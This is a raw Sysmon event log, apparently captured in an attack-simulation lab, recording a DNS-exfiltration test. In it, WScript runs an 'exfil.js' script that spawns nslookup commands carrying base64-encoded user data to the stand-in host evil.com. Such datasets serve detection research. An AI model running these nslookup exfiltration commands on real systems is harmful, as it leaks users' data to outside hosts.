14:16:26.020{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.020{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.020{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.020{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-C93F-000000005F02}1136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.020{2E1864BB-17A1-629A-783D-000000005F02}55524200C:\Windows\System32\WScript.exe{2E1864BB-17BA-629A-C93F-000000005F02}1136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.021{2E1864BB-17BA-629A-C93F-000000005F02}1136C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljstgy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.003{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldwu.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043931Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:26.120{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B722FAB08D091C7184173A966A27F91,SHA256=4694F5770344A53E9D98E83AC418958932FBA3EED11BA85593EC9AB8DC19DC1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000199462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.984{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlaeop.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.969{2E1864BB-17BB-629A-1240-000000005F02}77923300C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-1340-000000005F02}4192C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.969{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.969{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.969{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.969{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.969{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-1340-000000005F02}4192C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.969{2E1864BB-17BB-629A-1140-000000005F02}50882704C:\Windows\system32\cmd.exe{2E1864BB-17BB-629A-1340-000000005F02}4192C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.976{2E1864BB-17BB-629A-1340-000000005F02}4192C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BB-629A-1140-000000005F02}5088C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaeop.tmp 2>&1 10341000x8000000000000000199453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.953{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-1240-000000005F02}7792C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.953{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-1240-000000005F02}7792C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.937{2E1864BB-17BB-629A-1240-000000005F02}77923300C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-1140-000000005F02}5088C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.937{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-1240-000000005F02}7792C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.922{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.922{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.922{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.922{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.922{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-1140-000000005F02}5088C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.922{2E1864BB-17A1-629A-783D-000000005F02}55526984C:\Windows\System32\WScript.exe{2E1864BB-17BB-629A-1140-000000005F02}5088C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.933{2E1864BB-17BB-629A-1140-000000005F02}5088C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaeop.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.922{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlovrbe.tmpMD5=20783302D7601A2AA375A824723F16E5,SHA256=71E896EDC683926A4A0C6EDE66358751D292E4E8C82F0E9349EA1FBAA2ABF001,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.906{2E1864BB-17BB-629A-0F40-000000005F02}16603588C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-1040-000000005F02}1344C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.906{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.906{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 